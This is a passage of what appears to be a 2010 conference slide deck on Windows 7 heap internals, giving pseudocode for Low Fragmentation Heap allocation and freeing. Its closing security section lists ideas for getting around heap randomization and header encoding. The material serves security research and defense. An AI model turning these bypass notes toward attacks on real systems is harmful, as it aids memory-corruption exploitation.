- **ListHints** – Also known as FreeLists, these linked lists provide pointers to free chunks of memory, while also serving another purpose. If the LFH is enabled for a given Bucket size, then the blink of a specifically sized ListHint/FreeList will contain the address of a _HEAP_BUCKET + 1.

_LFH_BLOCK_ZONE

- **ListEntry** – A linked list of _LFH_BLOCK_ZONE structures.
- **FreePointer** – This will hold a pointer to memory that can be used by a _HEAP_SUBSEGMENT.
- **Limit** – The last _LFH_BLOCK_ZONE structure in the list. When this value is reached or exceeded, the back-end heap will be used to create more _LFH_BLOCK_ZONE structures.

_LFH_HEAP (HeapBase->FrontEndHeap)

<table> <thead> <tr> <th>Offset</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>+0x024 Heap</td> <td>Ptr32 Void</td> </tr> <tr> <td>+0x110 Buckets</td> <td>[128] _HEAP_BUCKET</td> </tr> <tr> <td>+0x310 LocalData</td> <td>[1] _HEAP_LOCAL_DATA</td> </tr> </tbody> </table>

- **Heap** – A pointer to the parent heap of this LFH.
- **Buckets** – An array of 0x4-byte data structures that are used for the sole purpose of keeping track of indices and sizes. This is why the term **Bin** will be used to describe the area of memory used to fulfill requests for a certain **Bucket** size.
- **LocalData** – This is a pointer to a large data structure which holds information about each **SubSegment**. See _HEAP_LOCAL_DATA for more information.

## _HEAP_LOCAL_DATA (HeapBase->FrontEndHeap->LocalData)

<table> <thead> <tr> <th>Offset</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>+0x00c LowFragHeap</td> <td>Ptr32 _LFH_HEAP</td> </tr> <tr> <td>+0x018 SegmentInfo</td> <td>[128] _HEAP_LOCAL_SEGMENT_INFO</td> </tr> </tbody> </table>

- **LowFragHeap** – The Low Fragmentation heap associated with this structure.
- **SegmentInfo** – An array of _HEAP_LOCAL_SEGMENT_INFO structures representing all available sizes for this LFH. This structure type will be discussed in later sections.
**_HEAP_LOCAL_SEGMENT_INFO** (HeapBase->FrontEndHeap->LocalData->SegmentInfo[])

<table> <thead> <tr> <th>Offset</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>+0x000</td> <td>Hint : Ptr32 _HEAP_SUBSEGMENT</td> </tr> <tr> <td>+0x004</td> <td>ActiveSubsegment : Ptr32 _HEAP_SUBSEGMENT</td> </tr> <tr> <td>+0x058</td> <td>LocalData : Ptr32 _HEAP_LOCAL_DATA</td> </tr> <tr> <td>+0x060</td> <td>BucketIndex : Uint2B</td> </tr> </tbody> </table>

- **Hint** – This **SubSegment** is only set when the LFH frees a chunk which it is managing. If a chunk is never freed, this value will always be **NULL**.
- **ActiveSubsegment** – The **SubSegment** used for most memory requests. While initially NULL, it is set on the **first** allocation for a specific size.
- **LocalData** – The **_HEAP_LOCAL_DATA** structure associated with this structure.
- **BucketIndex** – Each **SegmentInfo** object is related to a certain **Bucket** size (or index).

**_HEAP_SUBSEGMENT** (HeapBase->FrontEndHeap->LocalData->SegmentInfo[]->Hint,ActiveSubsegment,CachedItems)

<table> <thead> <tr> <th>Offset</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>+0x000 LocalInfo</td> <td>Ptr32 _HEAP_LOCAL_SEGMENT_INFO</td> </tr> <tr> <td>+0x004 UserBlocks</td> <td>Ptr32 _HEAP_USERDATA_HEADER</td> </tr> <tr> <td>+0x008 AggregateExchg</td> <td>_INTERLOCK_SEQ</td> </tr> <tr> <td>+0x016 SizeIndex</td> <td>UChar</td> </tr> </tbody> </table>

- **LocalInfo** – The _HEAP_LOCAL_SEGMENT_INFO structure associated with this structure.
- **UserBlocks** – A _HEAP_USERDATA_HEADER structure coupled with this SubSegment which holds a large chunk of memory split into n-number of chunks.
- **AggregateExchg** – An _INTERLOCK_SEQ structure used to keep track of the current Offset and Depth.
- **SizeIndex** – The _HEAP_BUCKET SizeIndex for this SubSegment.

### _HEAP_USERDATA_HEADER
(HeapBase->FrontEndHeap->LocalData->SegmentInfo[]->Hint,ActiveSubsegment,CachedItems->UserBlocks)

<table> <thead> <tr> <th>Offset</th> <th>Name</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>+0x000</td> <td>SubSegment</td> <td>Ptr32 _HEAP_SUBSEGMENT</td> </tr> <tr> <td>+0x004</td> <td>Reserved</td> <td>Ptr32 Void</td> </tr> <tr> <td>+0x008</td> <td>SizeIndex</td> <td>Uint4B</td> </tr> <tr> <td>+0x00c</td> <td>Signature</td> <td>Uint4B</td> </tr> <tr> <td>+0x010</td> <td>User Writable Data</td> <td>XXXX</td> </tr> </tbody> </table>

**_INTERLOCK_SEQ** (HeapBase->FrontEndHeap->LocalData->SegmentInfo[]->Hint,ActiveSubsegment,CachedItems->AggregateExchg)

- **Depth** – A counter that keeps track of how many chunks are left in a UserBlock. This number is incremented on a free and decremented on an allocation. Its value is initialized to the size of the UserBlock divided by the HeapBucket size.
- **FreeEntryOffset** – This 2-byte integer holds a value that, when added to the address of the _HEAP_USERDATA_HEADER, results in a pointer to the next location for freeing or allocating memory. This value is represented in blocks (0x8-byte chunks) and is initialized to 0x2, as sizeof(_HEAP_USERDATA_HEADER) is 0x10. [0x2 * 0x8 == 0x10]
- **OffsetAndDepth** – Since Depth and FreeEntryOffset are 2 bytes each, they are combined into this single 4-byte value.

_HEAP_ENTRY (Chunk Header)

- **Size** – The size, in blocks, of the chunk. This includes the _HEAP_ENTRY itself.
- **Flags** – Flags denoting the state of this heap chunk. Some examples are FREE or BUSY.
- **SmallTagIndex** – This value will hold the XOR’ed checksum of the first three bytes of the _HEAP_ENTRY.
- **UnusedBytes/ExtendedBlockSignature** – A value used to hold the unused bytes or a byte indicating the state of the chunk being managed by the LFH.

Architecture

“The winner of the BIG award is…”

Once upon a time there were dedicated FreeLists which were terminated with pointers to sentinel nodes.
Empty lists would contain a Flink and Blink pointing to itself.

Win7 FreeLists

- The concept of dedicated FreeLists has gone away. FreeList or ListHints will point to a location within Heap->FreeLists.
- They terminate by pointing to &HeapBase->FreeLists. Empty lists will be NULL or contain information used by the LFH.
- Only Heap->FreeLists is initialized to have its Flink/Blink pointing to itself.
- Chunks >= ArraySize-1 will be tracked in BlocksIndex->ListHints[ArraySize-BaseIndex-1]
- If the LFH is enabled for a specific Bucket then the ListHint->Blink will contain the address of a _HEAP_BUCKET + 1. Otherwise, ListHint->Blink can contain a counter used to enable the LFH for that specific _HEAP_BUCKET.
- The LFH can manage chunks from 8 bytes to 16k bytes. FreeLists can track 16k+ byte chunks, but those will not use the LFH.

Circular Organization of Chunk Headers (COCHs)

Algorithms: Allocation

"@hzon Do you remember any of the stuff we did last year?"

Alignment

• **RtlAllocateHeap: Part I**
• It will round the size to be 8-byte aligned, then find the appropriate BlocksIndex structure to service this request, falling back to the *FreeList[0]*-like structure if none can service it.

```c
if(Size == 0x0)
    Size = 0x1;

//ensure that this number is 8-byte aligned
int RoundSize = Round(Size);
int BlockSize = RoundSize / 8;

//get the HeapListLookup, which determines if we should use the LFH
_HEAP_LIST_LOOKUP *BlocksIndex = (_HEAP_LIST_LOOKUP*)heap->BlocksIndex;

//loop through the HeapListLookup structures to determine which one to use
while(BlockSize >= BlocksIndex->ArraySize)
{
    if(BlocksIndex->ExtendedLookup == NULL)
    {
        BlockSize = BlocksIndex->ArraySize - 1;
        break;
    }
    BlocksIndex = BlocksIndex->ExtendedLookup;
}
```

* The above search will now be referred to as: **BlocksIndexSearch()**

• **RtlAllocateHeap: Part II**
- The ListHints will now be queried to look for an optimal entry point into the FreeLists. A check is then made to see if the LFH or the back-end should be used.
```c
//get the appropriate freelist to use based on size
int FreeListIndex = BlockSize - HeapListLookup->BaseIndex;
LIST_ENTRY *FreeList = &HeapListLookup->ListHints[FreeListIndex];

if (FreeList)
{
    //check FreeList[index]->Blink to see if the heap bucket
    //context has been populated via RtlpGetLFHContext()
    //RtlpGetLFHContext() stores the HeapBucket
    //context + 1 in the Blink
    HEAP_BUCKET *HeapBucket = FreeList->Blink;
    if (HeapBucket & 1)
    {
        RetChunk = RtlpLowFragHeapAllocFromContext(HeapBucket+1, aBytes);
        if (RetChunk && (Flags & HEAP_ZERO_MEMORY))
            memset(RetChunk, 0, RoundSize);
    }
}

//if the front-end allocator did not succeed, use the back-end
if (!RetChunk)
{
    RetChunk = RtlpAllocateHeap(heap, Flags | 2, Size, RoundSize, FreeList);
}
```

“Working in the library? Every day I’m Hustlin’!”

Allocation: Back-end

• **RtlpAllocateHeap: Part I**
• The size is rounded if necessary, and **RtlpPerformHeapMaintenance()** is called based on the **CompatibilityFlags**. This is what actually enables the LFH.

```c
int RoundSize = aRoundSize;

//if the FreeList isn't NULL, the rounding has already been performed
if (!FreeList)
{
    RoundSize = Round(Size);
}

int SizeInBlocks = RoundSize / 8;
if (SizeInBlocks < 2)
{
    //RoundSize += sizeof(_HEAP_ENTRY)
    RoundSize = RoundSize + 8;
    SizeInBlocks = 2;
}

//if NOT HEAP_NO_SERIALIZE, use locking mechanisms
//LFH CANNOT be enabled if this path isn't taken
if (!(Flags & HEAP_NO_SERIALIZE))
{
    if (Heap->CompatibilityFlags & 0x60000000)
        RtlpPerformHeapMaintenance(Heap);
}
```

• **RtlpAllocateHeap: Part II**
- If there is a FreeList and it doesn’t hold a _HEAP_BUCKET, update the flags used to enable the LFH. If the LFH is already enabled, assign the _HEAP_BUCKET to the blink.
```c //if this freelist doesn't hold a _HEAP_BUCKET if(FreeList != NULL && !(FreeList->Blink & 1)) { //increment the counter FreeList->Blink += 0x10002; //on the 0x10th time, try to get a _HEAP_BUCKET if((WORD)FreeList->Blink > 0x20 || FreeList->Blink > 0x10000000) { int FrontEndHeap; if(Heap->FrontEndHeapType == 0x2) FrontEndHeap = Heap->FrontEndHeap; else FrontEndHeap = NULL; //gets _HEAP_BUCKET in LFH->Bucket[BucketSize] char *LFHContext = RtlpGetLFHContext(FrontEndHeap, Size); //if the context isn't set AND //we've seen 0x10+ allocations, set the flags if(LFHContext == NULL) { if((WORD)FreeList->Blink > 0x20) { //RtlpPerformHeapMaintenance heuristic if(Heap->FrontEndHeapType == NULL) Heap->CompatibilityFlags |= 0x20000000; } } else { //save the _HEAP_BUCKET in the Blink FreeList->Blink = LFHContext + 1; } } } ``` • **RtlpAllocateHeap: Part III** • If we’ve found a chunk in one of the **FreeLists** it can now be safely **unlinked** from the list and the **ListsInUseUlong** will be updated if necessary. The chunk will then be returned to the calling process. 
```c //attempt to use the Flink if (FreeList != NULL && FreeList->Flink != NULL) { //saved values _HEAP_ENTRY *Blink = FreeList->Blink; _HEAP_ENTRY *Flink = FreeList->Flink; //get the heap chunk header by subtracting 8 _HEAP_ENTRY *ChunkToUseHeader = Flink - 8; DecodeAndValidateChecksum(ChunkToUseHeader); //ensure safe unlinking before acquiring this chunk for use if (Blink->Flink != Flink->Blink || Blink->Flink != FreeList) { RtlpLogHeapFailure(); //XXX RtlNtStatusToDosError and return } //update the bitmap if needed _HEAP_LIST_LOOKUP *BlocksIndex = Heap->BlocksIndex; if (BlocksIndex) { int FreeListOffset = GetFreeListOffset(); //if there are more of the same size //don't update the bitmap if (!LastInList(BlocksIndex, FreeListOffset)) BlocksIndex->ListHints[FreeListOffset] = Flink->Flink; else UpdateBitmap(BlocksIndex->ListsInUseUlong); //bitwise AND } //unlink the current chunk to be allocated Blink->Flink = Flink; Flink->Blink = Blink; } ``` Allocation: Back-end **RtlpAllocateHeap: Part IV** - If the `ListHints` weren't successful, attempt to use the `Heap->FreeList / BlocksIndex->ListHead`. If successful it will return `ChunkToUse`, otherwise the heap will need to be extended via `RtlpExtendHeap()`. 
```c
//BI->ListHead == Heap->FreeLists
_LIST_ENTRY *HeapFreeLists = &Heap->FreeLists;
_LIST_ENTRY *ChunkToUse;
_HEAP_LIST_LOOKUP *BI = Heap->BlocksIndex;

while(1)
{
    //bail if the list is empty
    if(BI == NULL || BI->ListHead->Flink == BI->ListHead)
    {
        ChunkToUse = BI->ListHead;
        break;
    }

    _HEAP_ENTRY *BlinkHeader = DecodeHeader(BI->ListHead->Blink - 8);

    //if the requested size is too big, extend the heap
    if(SizeInBlocks > BlinkHeader->Size)
    {
        ChunkToUse = BI->ListHead;
        break;
    }

    _HEAP_ENTRY *FlinkHeader = DecodeHeader(BI->ListHead->Flink - 8);

    //if the first chunk is sufficient use it
    //otherwise loop through the rest
    if(FlinkHeader->Size >= SizeInBlocks)
    {
        ChunkToUse = BI->ListHead->Flink;
        break;
    }
    else
        FindChunk(BlocksIndex->ListHints, SizeInBlocks);

    //look at the next blocks index
    BI = BI->ExtendedLookup;
}
```

Algorithms: Allocation : Front-End

“Dr. Raid will take your pizza, fo sho“

• **RtlpLowFragHeapAllocFromContext: Part I**
• A _HEAP_SUBSEGMENT is acquired based off the _HEAP_BUCKET passed to the function. The Hint SubSegment is tried first, proceeding to the ActiveSubsegment pending a failure. If either of these succeeds in the allocation request, the chunk is returned.
```c
// gets the data structures based off the SizeIndex (affinity left out)
_LFH_HEAP *LFH = GetLFHFromBucket(HeapBucket);
_HEAP_LOCAL_DATA *HeapLocalData = LFH->LocalData[LocalDataIndex];
_HEAP_LOCAL_SEGMENT_INFO *HeapLocalSegmentInfo =
    HeapLocalData->SegmentInfo[HeapBucket->SizeIndex];

// try to use the 'Hint' SubSegment first
// otherwise this would be 'ActiveSubsegment'
_HEAP_SUBSEGMENT *SubSeg = HeapLocalSegmentInfo->Hint;
_HEAP_SUBSEGMENT *SubSeg_Saved = HeapLocalSegmentInfo->Hint;

if(SubSeg)
{
    while(1)
    {
        // get the current AggregateExchange information
        _INTERLOCK_SEQ *AggrExchg = SubSeg->AggregateExchg;
        int Offset = AggrExchg->FreeEntryOffset;
        int Depth = AggrExchg->Depth;
        int Sequence = AggrExchg->Sequence;

        // attempt a different subsegment if this one is invalid
        _HEAP_USERDATA_HEADER *UserBlocks = SubSeg->UserBlocks;
        if(!Depth || !UserBlocks || SubSeg->LocalInfo != HeapLocalSegmentInfo)
            break;

        int ByteOffset = Offset * 8;
        LFHChunk = UserBlocks + ByteOffset;

        // the next offset is stored in the 1st 2-bytes of the user data
        short NextOffset = *(short *)(UserBlocks + ByteOffset + sizeof(_HEAP_ENTRY));

        if(AtomicUpdate(AggrExchg, NextOffset, Depth--))
            return LFHChunk;
        else
            SubSeg = SubSeg_Saved;
    }
}
```

**Allocation: Front-end**

- **RtlpLowFragHeapAllocFromContext: Part II**
- If a SubSegment wasn’t able to fulfill the allocation, the LFH must create a new SubSegment along with an associated **UserBlock**. A **UserBlock** is the chunk of memory that holds individual chunks for a specific **_HEAP_BUCKET**. A certain formula is used to calculate how much memory should actually be acquired via the back-end allocator.
```c
//assume no bucket affinity
int TotalBlocks = HeapLocalSegmentInfo->Counters->TotalBlocks;
int BucketBytesSize = RtlpBucketBlockSizes[HeapBucket->SizeIndex];
int StartIndex = 7;
int BlockMultiplier = 5;

if(TotalBlocks < (1 << BlockMultiplier))
{
    TotalBlocks = 1 << BlockMultiplier;
}

if(TotalBlocks > 1024)
{
    TotalBlocks = 1024;
}

//used to calculate cache index and size to allocate
int TotalBlockSize = TotalBlocks * (BucketBytesSize + sizeof(_HEAP_ENTRY)) +
    sizeof(_HEAP_USERDATA_HEADER) + sizeof(_HEAP_ENTRY);

if(TotalBlockSize > 0x78000)
{
    TotalBlockSize = 0x78000;
}

//calculate the cache index; upon a cache miss, this index will determine
//the amount of memory to be allocated
if(TotalBlockSize >= 0x80)
{
    do
    {
        StartIndex++;
    } while(TotalBlockSize >> StartIndex);
}

//we will at most allocate 0x40 pages (0x1000 bytes per page)
if((unsigned)StartIndex > 0x12)
    StartIndex = 0x12;

int UserBlockCacheIndex = StartIndex;

//allocate ((1 << UserBlockCacheIndex) / BucketBytesSize) chunks on a cache miss
void *pUserData = RtlpAllocateUserBlock(lfh, UserBlockCacheIndex, BucketBytesSize + 8);
_HEAP_USERDATA_HEADER *UserData = (_HEAP_USERDATA_HEADER*)pUserData;
if(!pUserData)
    return 0;
```

• **RtlpLowFragHeapAllocFromContext: Part III**
• Now that a **UserBlock** has been allocated, the LFH can acquire a **_HEAP_SUBSEGMENT**. If a SubSegment has been found it will then initialize that SubSegment along with the UserBlock; otherwise the **back-end** will have to be used to fulfill the allocation request.
```c
int UserDataBytesSize = 1 << UserData->AvailableBlocks;
if(UserDataBytesSize > 0x78000) { UserDataBytesSize = 0x78000; }

int UserDataAllocSize = UserDataBytesSize - 8;

//increment SegmentCreate to denote a new SubSegment created
InterlockedExchangeAdd(&LFH->SegmentCreate, 1);

_HEAP_SUBSEGMENT *NewSubSegment = NULL;
DeletedSubSegment = ExInterlockedPopEntrySList(HeapLocalData);
if (DeletedSubSegment)
    NewSubSegment = (_HEAP_SUBSEGMENT *)(DeletedSubSegment - 0x18);
else
{
    NewSubSegment = RtlpLowFragHeapAllocateFromZone(LFH, LocalDataIndex);
    if(!NewSubSegment)
        return 0;
}

//this function will set up the _HEAP_SUBSEGMENT structure
//and chunk out the data in 'UserData' into HeapBucket->SizeIndex sized chunks
RtlpSubSegmentInitialize(LFH, NewSubSegment, UserData,
    RtlpBucketBlockSizes[HeapBucket->SizeIndex], UserDataAllocSize, HeapBucket);

//each UserBlock starts with the same sig
UserData->Signature = 0xF0E0D0C0;

//now used for LFH allocation for a specific bucket size
NewSubSegment = AtomicSwap(&HeapLocalSegmentInfo->ActiveSubsegment, NewSubSegment);
```

**Allocation: Front-end**

- **RtlpLowFragHeapAllocFromContext: Part IV [RtlpSubSegmentInitialize]**
  - The **UserBlock** chunk is divided into **BucketBlockSize** chunks, followed by the **SubSegment** initialization. Finally, this new SubSegment is ready to be assigned to HeapLocalSegmentInfo->ActiveSubsegment.
### Allocation: Front-End : Example I

#### UserBlock Chunks for 0x30 Bytes

![Diagram showing allocation of UserBlock Chunks for 0x30 Bytes](image)

- **NextOffset** chain (offsets in 8-byte blocks):
  - +0x02: NextOffset = 0x08
  - +0x08: NextOffset = 0x0E
  - +0x0E: NextOffset = 0x14
  - +0x14: NextOffset = 0x1A
  - +0x1A: NextOffset = 0x20
  - +0x20: NextOffset = 0x26
  - +0x26: NextOffset = 0x2C
  - +0x2C: NextOffset = 0x32
  - ...
- **Last Entry**: NextOffset = 0xFFFF
- **Next Virtual Address** = UserBlock + (NextOffset * 0x8)
- AggrExchg.Depth = 0x2A
- AggrExchg.FreeEntryOffset = 0x02

© 2010 IBM Corporation

Allocation : Front-End : Examples II and III

UserBlock Chunks for 0x30 Bytes [0x6 Blocks]

[Figures: the same UserBlock after successive allocations; each allocation pops the chunk at FreeEntryOffset and loads the next offset from its first two bytes of user data. After two allocations:]

- Last Entry: NextOffset = 0xFFFF
- Next Virtual Address = UserBlock + (NextOffset * 0x8)
- AggrExchg.Depth = 0x28
- AggrExchg.FreeEntryOffset = 0x0E

Algorithms: Freeing

"How can you go wrong? (re: Dogs wearing sunglasses)"

Freeing

- **RtlFreeHeap**
  - RtlFreeHeap will determine if the chunk is free-able. If so, it will decide whether the LFH or the **back-end** should be responsible for releasing the chunk.
```c
ChunkHeader = NULL;

// it will not operate on NULL
if(ChunkToFree == NULL)
    return;

// ensure the chunk is 8-byte aligned
if(!(ChunkToFree & 7))
{
    // subtract the sizeof(_HEAP_ENTRY)
    ChunkHeader = ChunkToFree - 0x8;

    // use the SegmentOffset to find the real header
    if(ChunkHeader->UnusedBytes == 0x5)
        ChunkHeader -= 0x8 * (BYTE)ChunkHeader->SegmentOffset;
}
else
{
    RtlpLogHeapFailure();
    return;
}

// position 0x7 in the header denotes whether the chunk was allocated via
// the front-end or the back-end (non-encoded ;)
if(ChunkHeader->UnusedBytes & 0x80)
    RtlpLowFragHeapFree(Heap, ChunkToFree);
else
    RtlpFreeHeap(Heap, Flags | 2, ChunkHeader, ChunkToFree);

return;
```

"Spencer Pratt explained this to me"

• **RtlpFreeHeap: Part I**
• The back-end manager will first look for a ListHint index to use as an insertion point. It will then attempt to update the counter used in the LFH heuristic.

```c
//returns ArraySize-1 on a miss with no ExtendedLookup
_HEAP_LIST_LOOKUP *BlocksIndex = Heap->BlocksIndex;
int ChunkSize = SearchBlocksIndex(BlocksIndex, ChunkHeader->Size);

//attempt to locate a FreeList
_LIST_ENTRY *ListHint = NULL;

//if the chunk can fit on a BlocksIndex OR
//BlocksIndex[ArraySize-BaseIndex-1] can hold the chunk
if(FitsInBlocksIndex(BlocksIndex, ChunkSize))
{
    int FreeListIndex = ChunkSize - BlocksIndex->BaseIndex;

    //acquire a dedicated freelist
    ListHint = BlocksIndex->ListHints[FreeListIndex];
}

if(ListHint != NULL)
{
    //if no HEAP_BUCKET is attached, adjust the counter
    if( !((BYTE)ListHint->Blink & 1) )
    {
        if(ListHint->Blink >= 2)
        {
            ListHint->Blink = ListHint->Blink - 2;
        }
    }
}
```

Freeing : Back-End

- **RtlpFreeHeap: Part II**
  - The header values are set for the chunk being freed and it is **coalesced** if necessary. While the function may be called on every free, it will only combine chunks that are adjacently **FREE**.
```c
//unless the heap says otherwise, coalesce the adjacent free blocks
int ChunkSize = ChunkHeader->Size;
if( !(Heap->Flags & 0x80) )
{
    //combine the adjacent blocks
    ChunkHeader = RtlpCoalesceFreeBlocks(Heap, ChunkHeader, &ChunkSize, 0x0);
}

//reassign the ChunkSize if necessary
ChunkSize = ChunkHeader->Size;

//XXX Decommit or give to Virtual Memory if exceeding the thresholds

//mark the chunk as FREE
ChunkHeader->Flags = 0x0;
ChunkHeader->UnusedBytes = 0x0;
```

• **RtlpFreeHeap: Part III**
• Now the heap manager will find which **BlocksIndex** and corresponding **ListHint** will manage this chunk. It will ensure that the **ListHead** isn't empty and can insert this chunk before the largest chunk residing on the list.

```c
BlocksIndex = Heap->BlocksIndex;
_LIST_ENTRY *InsertList = Heap->FreeLists.Flink;

//attempt to find where to insert this item
//on the ListHead list for a particular BlocksIndex
if(BlocksIndex)
{
    int FreeListIndex = BlocksIndexSearch(BlocksIndex, ChunkSize);

    while(BlocksIndex != NULL)
    {
        //abort if the list is empty or the chunk is too large to fit on this list
        _HEAP_ENTRY *ListHead = BlocksIndex->ListHead;
        if(ListHead == ListHead->Blink || ChunkSize > ListHead->Blink->Size)
        {
            InsertList = ListHead;
            break;
        }

        //start at the ListHint and pick the insertion point before the first
        //chunk larger than the ChunkToFree
        _LIST_ENTRY *NextChunk = BlocksIndex->ListHints[FreeListIndex];
        while(NextChunk != ListHead)
        {
            //there is actually some decoding done here
            if(NextChunk->Size > ChunkSize)
            {
                InsertList = NextChunk;
                break;
            }
            NextChunk = NextChunk->Flink;
        }

        //if we've found an insertion point, break
        if(InsertList != Heap->FreeLists.Flink)
            break;

        BlocksIndex = BlocksIndex->ExtendedLookup;
    }
}
```

Freeing: Back-End

- **RtlpFreeHeap: Part IV**
  - Finally the chunk is **safely** linked into the list and `ListInUseUlong` is updated.
```c
while (InsertList != &Heap->FreeLists)
{
    if (InsertList->Size > ChunkSize)
        break;
    InsertList = InsertList->Flink;
}

//R.I.P FreeList Insertion Attack
if (InsertList->Blink->Flink == InsertList)
{
    ChunkToFree->Flink = InsertList;
    ChunkToFree->Blink = InsertList->Blink;
    InsertList->Blink->Flink = ChunkToFree;
    InsertList->Blink = ChunkToFree;
}
else
{
    RtlpLogHeapFailure();
}

if (BlocksIndex)
{
    FreeListIndex = BlocksIndexSearch(BlocksIndex, ChunkSize);
    _LIST_ENTRY *FreeListToUse = BlocksIndex->ListHints[FreeListIndex];

    if (ChunkSize >= FreeListToUse->Size)
        BlocksIndex->ListHints[FreeListIndex] = ChunkToFree;

    //bitwise OR instead of previous XOR. R.I.P Bitmap flipping (hi nico)
    if (!FreeListToUse)
    {
        int UlongIndex = (ChunkSize - BlocksIndex->BaseIndex) >> 5;
        int Shifter = (ChunkSize - BlocksIndex->BaseIndex) & 0x1F;
        BlocksIndex->ListsInUseUlong[UlongIndex] |= 1 << Shifter;
    }

    EncodeHeader(ChunkHeader);
}
```

Algorithms: Freeing : Front-End

"Omar! Omar! Omar comin'!"

Freeing : Front-End

• **RtlpLowFragHeapFree: Part I**
• The chunk *header* will be checked to see if a relocation is necessary. Then the chunk to be freed will be used to get the *SubSegment*. Flags indicating the chunk is now *FREE* are also set.

```c
//hi ben hawkes :)
_HEAP_ENTRY *ChunkHeader = ChunkToFree - sizeof(_HEAP_ENTRY);
if(ChunkHeader->UnusedBytes == 0x5)
    ChunkHeader -= 8 * (BYTE)ChunkHeader->SegmentOffset;

_HEAP_ENTRY *ChunkHeader_Saved = ChunkHeader;

//gets the subsegment based from the LFHKey, Heap and ChunkHeader
_HEAP_SUBSEGMENT *SubSegment = GetSubSegment(Heap, ChunkToFree);
_HEAP_USERDATA_HEADER *UserBlocks = SubSegment->UserBlocks;

//Set flags to 0x80 for LFH_FREE (offset 0x7)
ChunkHeader->UnusedBytes = 0x80;

//Set SegmentOffset or LFHFlags (offset 0x6)
ChunkHeader->SegmentOffset = 0x0;
```

Freeing : Front-End

- **RtlpLowFragHeapFree: Part II**
  - The Offset and Depth can now be updated. The *NewOffset* should point to the chunk that was recently freed, and the Depth will be incremented by 0x1.
```c
while(1)
{
    // update Offset and Depth
    int Depth = SubSegment->AggregateExchg.Depth;
    int Offset = SubSegment->AggregateExchg.FreeEntryOffset;

    _INTERLOCK_SEQ AggrExchg_New;
    AggrExchg_New.Sequence = UpdateSeq(SubSegment->AggregateExchg);

    if(!MaintenanceNeeded(SubSegment))
    {
        // store the old FreeEntryOffset in the 1st 2 bytes of the freed chunk
        *(WORD *)((BYTE *)ChunkHeader + sizeof(_HEAP_ENTRY)) = Offset;

        // the freed chunk becomes the new list head, based off its offset
        // from the UserBlocks; add 0x1 to the depth due to freeing
        int NewOffset = ((BYTE *)ChunkHeader - (BYTE *)UserBlocks) / 8;
        AggrExchg_New.FreeEntryOffset = NewOffset;
        AggrExchg_New.Depth = Depth + 1;

        // this is where Hint is set :)
        SubSegment->LocalInfo->Hint = SubSegment;
    }
    else
    {
        PerformSubSegmentMaintenance(SubSegment);
        RtlpFreeUserBlock(LFH, SubSegment->UserBlocks);
        break;
    }

    // _InterlockedCompareExchange64
    if(AtomicSwap(&SubSegment->AggregateExchg, AggrExchg_New))
        break;
    else
        ChunkHeader = ChunkHeader_Saved;
}
```

Freeing : Front-End : Example I

UserBlock Chunks for 0x30 Bytes [0x6 Blocks]

[Figure: chunks +0x02, +0x08 and +0x0E are BUSY; the free list starts at +0x14]

- +0x14: NextOffset = 0x1A
- ...
- +0x2C: NextOffset = 0x32
- Last Entry: NextOffset = 0xFFFF
- Next Virtual Address = UserBlock + (NextOffset * 0x8)
- AggrExchg.Depth = 0x27
- AggrExchg.FreeEntryOffset = 0x14

Freeing : Front-End : Example II

UserBlock Chunks for 0x30 Bytes [0x6 Blocks]

[Figure: chunk +0x02 has been freed; its first two bytes now hold the previous head offset]

- +0x02: NextOffset = 0x14
- +0x14: NextOffset = 0x1A
- +0x20: NextOffset = 0x26
- +0x26: NextOffset = 0x2C
- +0x2C: NextOffset = 0x32
- Last Entry: NextOffset = 0xFFFF
- Next Virtual Address = UserBlock + (NextOffset * 0x8)
- AggrExchg.Depth = 0x28
AggrExchg.FreeEntryOffset = 0x02

Freeing : Front-End : Example III

UserBlock Chunks for 0x30 Bytes [0x6 Blocks]

[Figure: chunk +0x08 has been freed on top of +0x02; it becomes the new head]

- +0x02: NextOffset = 0x14
- +0x08: NextOffset = 0x02
- +0x14: NextOffset = 0x1A
- +0x20: NextOffset = 0x26
- +0x26: NextOffset = 0x2C
- +0x2C: NextOffset = 0x32
- Last Entry: NextOffset = 0xFFFF
- Next Virtual Address = UserBlock + (NextOffset * 0x8)
- AggrExchg.Depth = 0x29
- AggrExchg.FreeEntryOffset = 0x08

Security Mechanisms

"@shydemeanor I think I'm using too much code in the slides."

Security Mechanisms : Heap Randomization

```c
int RandPad = (RtlpHeapGenerateRandomValue64() & 0x1F) << 0x10;

// if maxsize + pad wraps, null out the randpad
int TotalMaxSize = MaximumSize + RandPad;
if(TotalMaxSize < MaximumSize)
{
    TotalMaxSize = MaximumSize;
    RandPad = 0;
}

if(NtAllocateVirtualMemory(-1, &BaseAddress....))
    return 0;

heap = (_HEAP*)BaseAddress;
MaximumSize = TotalMaxSize;

// if we used a random pad, adjust the heap pointer and free the excess memory
if(RandPad != 0)
{
    if(RtlpSecMemFreeVirtualMemory())
    {
        heap = (_HEAP*)(BaseAddress + RandPad);
        MaximumSize = TotalMaxSize - RandPad;
    }
}
```

• Information
  • 64k aligned
  • 5-bits of entropy
  • Used to avoid the same HeapBase on consecutive runs
• Thoughts
  • Not impossible to brute force
  • If TotalMaxSize wraps, there will be no RandPad
  • Hard to influence HeapCreate()
  • Unlikely due to NtAllocateVirtualMemory() failing

Security Mechanisms : Header Encoding/Decoding

- Information
  - Size, Flags, CheckSum encoded
  - Prevents predictable overwrites w/o an information leak
  - Makes header overwrites much more difficult
- Thoughts
  - NULL out Heap->EncodeFlagMask
  - I believe a new heap would be in order.
- Overwrite the first 4 bytes of the encoded header to break Header ^ Heap->Encoding (only useful for items in FreeLists)
  - Attack the last 4 bytes of the header

```c
EncodeHeader(_HEAP_ENTRY *Header, _HEAP *Heap)
{
    if(Heap->EncodeFlagMask)
    {
        // checksum = XOR of the first 3 bytes of the header
        Header->SmallTagIndex =
            ((BYTE *)Header)[0] ^ ((BYTE *)Header)[1] ^ ((BYTE *)Header)[2];
        *(DWORD *)Header ^= Heap->Encoding;
    }
}
```

```c
DecodeHeader(_HEAP_ENTRY *Header, _HEAP *Heap)
{
    if(Heap->EncodeFlagMask && (*(DWORD *)Header & Heap->EncodeFlagMask))
        *(DWORD *)Header ^= Heap->Encoding;
}
```

Security Mechanisms: Death of Bitmap Flipping

- Information
  - XOR no longer used
  - OR for population
  - AND for exhaustion
- Thoughts
  - SOL
  - Not as important as before, because FreeLists/ListHints aren't initialized to point to themselves.

```c
